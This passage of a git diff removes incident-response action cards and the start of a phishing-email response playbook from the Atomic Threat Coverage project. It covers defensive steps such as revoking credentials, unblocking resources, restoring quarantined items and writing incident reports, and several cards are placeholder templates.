-| Title                       | Remove registry key         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4501            |
-| **Description**             | Remove a registry key   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4502_remove_service.md b/Atomic_Threat_Coverage/Response_Actions/RA_4502_remove_service.md
deleted file mode 100644
index aa3f344..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4502_remove_service.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Remove service         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4502            |
-| **Description**             | Remove a service   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4601_revoke_authentication_credentials.md b/Atomic_Threat_Coverage/Response_Actions/RA_4601_revoke_authentication_credentials.md
deleted file mode 100644
index ab35a42..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4601_revoke_authentication_credentials.md
+++ /dev/null
@@ -1,18 +0,0 @@
-| Title                       | Revoke authentication credentials         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4601            |
-| **Description**             | Revoke authentication credentials   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **References** |<ul><li>[https://adsecurity.org/?p=556](https://adsecurity.org/?p=556)</li><li>[https://adsecurity.org/?p=483](https://adsecurity.org/?p=483)</li></ul>|
-
-### Workflow
-
-On this step, you supposed to know what kind of credentials have been compromised/you would like to revoke.  
-You need to revoke them in your Identity and Access Management system where they were created (i.e. Windows AD) using native functionality.  
-
-Warning:  
-
-- If the adversary has generated Golden Ticket in Windows Domain/forest, you have to revoke KRBTGT Account password **twice** for each domain in a forest and proceed to monitor malicious activity for next 20 minutes (Domain Controller KDC service doesn’t perform validate the user account until the TGT is older than 20 minutes old)
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_4602_remove_user_account.md b/Atomic_Threat_Coverage/Response_Actions/RA_4602_remove_user_account.md
deleted file mode 100644
index 19b497a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_4602_remove_user_account.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Remove user account         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA4602            |
-| **Description**             | Remove a user account   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0004: Eradication](../Response_Stages/RS0004.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5001_reinstall_host_from_golden_image.md b/Atomic_Threat_Coverage/Response_Actions/RA_5001_reinstall_host_from_golden_image.md
deleted file mode 100644
index 140ffd6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5001_reinstall_host_from_golden_image.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Reinstall host from golden image         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5001            |
-| **Description**             | Reinstall host OS from a golden image   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5002_restore_data_from_backup.md b/Atomic_Threat_Coverage/Response_Actions/RA_5002_restore_data_from_backup.md
deleted file mode 100644
index 9c5c4b3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5002_restore_data_from_backup.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Restore data from backup         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5002            |
-| **Description**             | Restore data from a backup   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5101_unblock_blocked_ip.md b/Atomic_Threat_Coverage/Response_Actions/RA_5101_unblock_blocked_ip.md
deleted file mode 100644
index f6a843a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5101_unblock_blocked_ip.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Unblock blocked IP         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5101            |
-| **Description**             | Unblock a blocked IP address   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_intranet_firewall</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Unblock a blocked IP address in the system(s) used to block it.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5102_unblock_blocked_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_5102_unblock_blocked_domain.md
deleted file mode 100644
index 71eec0d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5102_unblock_blocked_domain.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Unblock blocked domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5102            |
-| **Description**             | Unblock a blocked domain name   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_dns_server</li></ul>|
-
-### Workflow
-
-Unblock a blocked domain name in the system(s) used to block it.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5103_unblock_blocked_url.md b/Atomic_Threat_Coverage/Response_Actions/RA_5103_unblock_blocked_url.md
deleted file mode 100644
index 518d58b..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5103_unblock_blocked_url.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Unblock blocked URL         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5103            |
-| **Description**             | Unblock a blocked URL   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Network      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li></ul>|
-
-### Workflow
-
-Unblock a blocked URL in the system(s) used to block it.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5104_unblock_blocked_port.md b/Atomic_Threat_Coverage/Response_Actions/RA_5104_unblock_blocked_port.md
deleted file mode 100644
index 20f0896..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5104_unblock_blocked_port.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Unblock blocked port         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5104            |
-| **Description**             | Unblock a blocked port   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5105_unblock_blocked_user.md b/Atomic_Threat_Coverage/Response_Actions/RA_5105_unblock_blocked_user.md
deleted file mode 100644
index c8c8ae0..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5105_unblock_blocked_user.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Unblock blocked user         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5105            |
-| **Description**             | Unblock a blocked user   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5201_unblock_domain_on_email.md b/Atomic_Threat_Coverage/Response_Actions/RA_5201_unblock_domain_on_email.md
deleted file mode 100644
index f18d9c6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5201_unblock_domain_on_email.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Unblock domain on email         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5201            |
-| **Description**             | Unblock a domain on email   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 07.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Unblock an email domain on an Email Server using its native functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5202_unblock_sender_on_email.md b/Atomic_Threat_Coverage/Response_Actions/RA_5202_unblock_sender_on_email.md
deleted file mode 100644
index e2b67d3..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5202_unblock_sender_on_email.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Unblock sender on email         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5202            |
-| **Description**             | Unblock a sender on email   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Unblock an email sender on an Email Server using its native functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5203_restore_quarantined_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_5203_restore_quarantined_email_message.md
deleted file mode 100644
index c044087..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5203_restore_quarantined_email_message.md
+++ /dev/null
@@ -1,13 +0,0 @@
-| Title                       | Restore quarantined email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5203            |
-| **Description**             | Restore a quarantined email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Restore a quarantined email message on an Email Server using its native functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5301_restore_quarantined_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_5301_restore_quarantined_file.md
deleted file mode 100644
index 9610a3a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5301_restore_quarantined_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Restore quarantined file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5301            |
-| **Description**             | Restore a quarantined file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5401_unblock_blocked_process.md b/Atomic_Threat_Coverage/Response_Actions/RA_5401_unblock_blocked_process.md
deleted file mode 100644
index 21fcaef..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5401_unblock_blocked_process.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Unblock blocked process         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5401            |
-| **Description**             | Unblock a blocked process   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5501_enable_disabled_service.md b/Atomic_Threat_Coverage/Response_Actions/RA_5501_enable_disabled_service.md
deleted file mode 100644
index 5af01de..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5501_enable_disabled_service.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Enable disabled service         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5501            |
-| **Description**             | Enable a disabled service   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_5601_unlock_locked_user_account.md b/Atomic_Threat_Coverage/Response_Actions/RA_5601_unlock_locked_user_account.md
deleted file mode 100644
index d39a839..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_5601_unlock_locked_user_account.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Unlock locked user account         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA5601            |
-| **Description**             | Unlock a locked user account   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0005: Recovery](../Response_Stages/RS0005.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_6001_develop_incident_report.md b/Atomic_Threat_Coverage/Response_Actions/RA_6001_develop_incident_report.md
deleted file mode 100644
index 85138cf..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_6001_develop_incident_report.md
+++ /dev/null
@@ -1,21 +0,0 @@
-| Title                       | Develop incident report         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA6001            |
-| **Description**             | Develop the incident report   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | General      |
-| **Stage**                   |[RS0006: Lessons Learned](../Response_Stages/RS0006.md)| 
-| **References** |<ul><li>[https://attack.mitre.org/tactics/enterprise/](https://attack.mitre.org/tactics/enterprise/)</li><li>[https://en.wikipedia.org/wiki/Kill_chain](https://en.wikipedia.org/wiki/Kill_chain)</li></ul>|
-
-### Workflow
-
-Develop the Incident Report using your corporate template.  
-
-It should include:  
-
-1. Executive Summary with a short description of damage, actions taken, root cause, and key metrics (Time To Detect, Time To Respond, Time To Recover etc)  
-2. Detailed timeline of adversary actions mapped to [ATT&CK tactics](https://attack.mitre.org/tactics/enterprise/) (you can use the [Kill Chain](https://en.wikipedia.org/wiki/Kill_chain), but most probably most of the actions will be in Actions On Objective stage, which is not very representative and useful)  
-3. Detailed timeline of actions taken by Incident Response Team  
-4. Root Cause Analysis and Recommendations for improvements based on its conclusion  
-5. List of specialists involved in Incident Response with their roles  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_6002_conduct_lessons_learned_exercise.md b/Atomic_Threat_Coverage/Response_Actions/RA_6002_conduct_lessons_learned_exercise.md
deleted file mode 100644
index 9f46592..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_6002_conduct_lessons_learned_exercise.md
+++ /dev/null
@@ -1,22 +0,0 @@
-| Title                       | Conduct lessons learned exercise         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA6002            |
-| **Description**             | Conduct Lessons Learned exercise   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 31.01.2019 |
-| **Category**                | General      |
-| **Stage**                   |[RS0006: Lessons Learned](../Response_Stages/RS0006.md)| 
-| **References** |<ul><li>[http://shop.oreilly.com/product/0636920043614.do](http://shop.oreilly.com/product/0636920043614.do)</li><li>[https://www.amazon.com/Incident-Response-Computer-Forensics-Third/dp/0071798684](https://www.amazon.com/Incident-Response-Computer-Forensics-Third/dp/0071798684)</li></ul>|
-
-### Workflow
-
-The Lessons Learned phase evaluates the team's performance through each step. 
-The goal of the phase is to discover how to improve the incident response process.  
-You need to answer some basic questions, using developed incident report:  
-
-- What happened?  
-- What did we do well?  
-- What could we have done better?  
-- What will we do differently next time?  
-
-The incident report is the key to improvements.  
diff --git a/Atomic_Threat_Coverage/Response_Playbooks/RP_0001_phishing_email.md b/Atomic_Threat_Coverage/Response_Playbooks/RP_0001_phishing_email.md
deleted file mode 100644
index a16d97b..0000000
--- a/Atomic_Threat_Coverage/Response_Playbooks/RP_0001_phishing_email.md
+++ /dev/null
@@ -1,344 +0,0 @@
-| Title             | Phishing email                                                                                                      |
-|:-----------------:|:-----------------------------------------------------------------------------------------------------------------|
-| **ID**            | RP0001            |
-| **Description**   | Response playbook for Phishing Email case   |
-| **Author**        | @atc_project        |
-| **Creation Date** | 31.01.2019 |
-| **Severity**      | M      |
-| **TLP**           | AMBER           |
-| **PAP**           | WHITE           |
-| **ATT&amp;CK Tactic**  |<ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>|
-| **ATT&amp;CK Technique**  |<ul><li>[T1193: Spearphishing Attachment](https://attack.mitre.org/tactics/T1193)</li><li>[T1192: Spearphishing Link](https://attack.mitre.org/tactics/T1192)</li></ul>|
-| **Tags**          | <ul><li>phishing</li></ul> |
-| **Preparation**  |<ul><li>[RA1001: Practice](../Response_Actions/RA_1001_practice.md)</li><li>[RA1002: Take trainings](../Response_Actions/RA_1002_take_trainings.md)</li><li>[RA1004: Make personnel report suspicious activity](../Response_Actions/RA_1004_make_personnel_report_suspicious_activity.md)</li><li>[RA1003: Raise personnel awareness](../Response_Actions/RA_1003_raise_personnel_awareness.md)</li><li>[RA1101: Access external network flow logs](../Response_Actions/RA_1101_access_external_network_flow_logs.md)</li><li>[RA1104: Access external HTTP logs](../Response_Actions/RA_1104_access_external_http_logs.md)</li><li>[RA1106: Access external DNS logs](../Response_Actions/RA_1106_access_external_dns_logs.md)</li><li>[RA1111: Get ability to block external IP address](../Response_Actions/RA_1111_get_ability_to_block_external_ip_address.md)</li><li>[RA1113: Get ability to block external domain](../Response_Actions/RA_1113_get_ability_to_block_external_domain.md)</li><li>[RA1115: Get ability to block external URL](../Response_Actions/RA_1115_get_ability_to_block_external_url.md)</li><li>[RA1201: Get ability to list users opened email message](../Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md)</li><li>[RA1202: Get ability to list email message receivers](../Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md)</li><li>[RA1203: Get ability to block email domain](../Response_Actions/RA_1203_get_ability_to_block_email_domain.md)</li><li>[RA1204: Get ability to block email sender](../Response_Actions/RA_1204_get_ability_to_block_email_sender.md)</li><li>[RA1205: Get ability to delete email message](../Response_Actions/RA_1205_get_ability_to_delete_email_message.md)</li><li>[RA1206: Get ability to quarantine email message](../Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md)</li></ul>|
-| **Identification**  |<ul><li>[RA2003: Put compromised accounts on monitoring](../Response_Actions/RA_2003_put_compromised_accounts_on_monitoring.md)</li><li>[RA2113: List hosts communicated with external domain](../Response_Actions/RA_2113_list_hosts_communicated_with_external_domain.md)</li><li>[RA2114: List hosts communicated with external IP](../Response_Actions/RA_2114_list_hosts_communicated_with_external_ip.md)</li><li>[RA2115: List hosts communicated with external URL](../Response_Actions/RA_2115_list_hosts_communicated_with_external_url.md)</li><li>[RA2201: List users opened email message](../Response_Actions/RA_2201_list_users_opened_email_message.md)</li><li>[RA2202: Collect email message](../Response_Actions/RA_2202_collect_email_message.md)</li><li>[RA2203: List email message receivers](../Response_Actions/RA_2203_list_email_message_receivers.md)</li><li>[RA2204: Make sure email message is phishing](../Response_Actions/RA_2204_make_sure_email_message_is_phishing.md)</li><li>[RA2205: Extract observables from email message](../Response_Actions/RA_2205_extract_observables_from_email_message.md)</li></ul>|
-| **Containment**  |<ul><li>[RA3101: Block external IP address](../Response_Actions/RA_3101_block_external_ip_address.md)</li><li>[RA3103: Block external domain](../Response_Actions/RA_3103_block_external_domain.md)</li><li>[RA3105: Block external URL](../Response_Actions/RA_3105_block_external_url.md)</li><li>[RA3201: Block domain on email](../Response_Actions/RA_3201_block_domain_on_email.md)</li><li>[RA3202: Block sender on email](../Response_Actions/RA_3202_block_sender_on_email.md)</li><li>[RA3203: Quarantine email message](../Response_Actions/RA_3203_quarantine_email_message.md)</li></ul>|
-| **Eradication**  |<ul><li>[RA4001: Report incident to external companies](../Response_Actions/RA_4001_report_incident_to_external_companies.md)</li><li>[RA4201: Delete email message](../Response_Actions/RA_4201_delete_email_message.md)</li></ul>|
-| **Recovery**  |<ul><li>[RA5101: Unblock blocked IP](../Response_Actions/RA_5101_unblock_blocked_ip.md)</li><li>[RA5102: Unblock blocked domain](../Response_Actions/RA_5102_unblock_blocked_domain.md)</li><li>[RA5103: Unblock blocked URL](../Response_Actions/RA_5103_unblock_blocked_url.md)</li><li>[RA5201: Unblock domain on email](../Response_Actions/RA_5201_unblock_domain_on_email.md)</li><li>[RA5202: Unblock sender on email](../Response_Actions/RA_5202_unblock_sender_on_email.md)</li><li>[RA5203: Restore quarantined email message](../Response_Actions/RA_5203_restore_quarantined_email_message.md)</li></ul>|
-| **Lessons learned**  |<ul><li>[RA6001: Develop incident report](../Response_Actions/RA_6001_develop_incident_report.md)</li><li>[RA6002: Conduct lessons learned exercise](../Response_Actions/RA_6002_conduct_lessons_learned_exercise.md)</li></ul>|
-
-### Workflow
- 
-1. Execute Response Actions step by step. Some of them directly connected, which means you will not be able to move forward not finishing the previous step. Some of them are redundant, as those that are related to the blocking a threat using network filtering systems (containment stage)
-2. Start executing containment and eradication stages concurrently with next identification steps, as soon as you will receive information about malicious hosts
-3. If phishing led to code execution or remote access to victim host, immediately start executing Generic Post Exploitation Incident Response Playbook
-4. Save all timestamps of implemented actions in Incident Report draft on the fly, it will save a lot of time
-
-
-
-#### Preparation
-
-##### Practice in the real environment. Sharpen Response Actions within your organization
-
-Make sure that most of the Response Action has been performed on an internal exercise by your Incident Response Team.  
-You need to make sure that when an Incident will happen, the team will not just try to follow the playbooks they see first time in their lives, but will be able to quickly execute the actual steps in **your environment**, i.e. blocking an IP address or a domain name.  
-
-##### Take training courses to gain relevant knowledge
-
-> We do not rise to the level of our expectations. We fall to the level of our training.  
-
-Here are some relevant training courses that will help you in the Incident Response activities:  
-
-1. [Investigation Theory](https://chrissanders.org/training/investigationtheory/) by Chris Sanders. We recommend you to have it as a mandatory training for every member of your Incident Response team  
-2. [Offensive Security](https://www.offensive-security.com/courses-and-certifications/) trainings. We recommend [PWK](https://www.offensive-security.com/pwk-oscp/) to begin with  
-3. [SANS Digital Forensics & Incident Response](https://digital-forensics.sans.org/training/courses) trainings  
-
-Offensive Security trainings are in the list because to fight a threat, you need to understand their motivation, tactics, and techniques.  
-
-At the same time, we assume that you already have a strong technical background in fundamental disciplines — Networking, Operating Systems, and Programming.  
-
-##### Make sure that personnel will report suspicious activity i.e. suspicious emails,  links, files, activity on their computers, etc
-
-
-Develop a simplified, company wide-known way to contact IR team in case of suspicious activity on the user system.  
-Make sure that the personnel is aware of it, can and will use it.  
-
-##### Raise personnel awareness regarding phishing, ransomware, social engineering,  and other attacks that involve user interaction
-
-
-Train users to to be aware of access or manipulation attempts by an adversary to reduce the risk of 
-successful spearphishing, social engineering, and other techniques that involve user interaction.
-
-##### Make sure you have access to external communication Network Flow logs
-
-
-Make sure that there is a collection of Network Flow logs for external communication (from corporate assets to the Internet) configured.  
-If there is no option to configure it on a network device, you can install a special software on each endpoint and collect it from them.  
-
-Warning:  
-
-- There is a feature called ["NetFlow Sampling"](https://www.plixer.com/blog/how-accurate-is-sampled-netflow/), that eliminates the value of the Network Flow logs for some of the tasks, such as "check if some host communicated to an external IP". Make sure it's disabled or you have an alternative way to collect Network Flow logs  
-
-##### Make sure you have access to external communication HTTP logs
-
-
-Make sure that there is a collection of HTTP connections logs for external communication (from corporate assets to the Internet) configured.  
-
-##### Make sure you have access to external communication DNS logs
-
-
-Make sure that there is a collection of DNS logs for external communication (from corporate assets to the Internet) configured.  
-If there is no option to configure it on a network device/DNS Server, you can install a special software on each endpoint and collect it from them.  
-
-Warning:  
-
-- Make sure that there are both DNS query and answer logs collected. It's quite hard to configure such a collection on MS Windows DNS server and ISC BIND. Sometimes it much easier to use 3rd party solutions to fulfill this requirement.  
-- Make sure that DNS traffic to the external (public) DNS servers is blocked by the Border Firewall. This way, corporate DNS servers is the only place assets can resolve the domain names.  
-
-##### Make sure you have the ability to block an external IP address from being accessed by corporate assets
-
-
-Make sure you have the ability to create a policy rule in one of the listed Mitigation Systems that will you to block an external IP address from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external IP address from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
-
-##### Make sure you have the ability to block an external domain name from being accessed by corporate assets
-
-
-Make sure you have the ability to create a policy rule or a specific configuration in one of the listed Mitigation Systems that will you to block an external domain name from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external domain name from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
-
-##### Make sure you have the ability to block an external URL from being accessed by corporate assets
-
-
-Make sure you have the ability to create a policy rule or a specific configuration in one of the listed Mitigation Systems that will you to block an external URL from being accessed by corporate assets.  
-
-Warning:  
-
-- Make sure that using the listed systems (1 or multiple) you can control access to the internet of all assets in the infrastructure. In some cases, you will need a guaranteed way to block an external URL from being accessed by corporate assets completely. If some of the assets are not under the management of the listed Mitigation Systems, (so they can access the internet bypassing these systems), you will not be able to fully achieve the final objective of the Response Action.  
-
-##### Make sure you have the ability to list users who opened a particular email message
-
-
-Make sure you have the ability to list users who opened/read a particular email message using the Email Server's functionality.
-
-##### Make sure you have the ability to list receivers of a particular email message
-
-
-Make sure you have the ability to list receivers of a particular email message using the Email Server's functionality.
-
-##### Make sure you have the ability to block an email domain
-
-
-Make sure you have the ability to block an email domain on an Email Server using its native filtering functionality.  
-
-##### Make sure you have the ability to block an email sender
-
-
-Make sure you have the ability to block an email sender on an Email Server using its native filtering functionality.  
-
-##### Make sure you have the ability to delete an email message
-
-
-Make sure you have the ability to delete an email message from an Email Server and users' email boxes using its native functionality.
-
-##### Make sure you have the ability to quarantine an email message
-
-
-Make sure you have the ability to quarantine an email message on an Email Server using its native functionality.  
-
-#### Identification
-
-##### Put (potentially) compromised accounts on monitoring
-
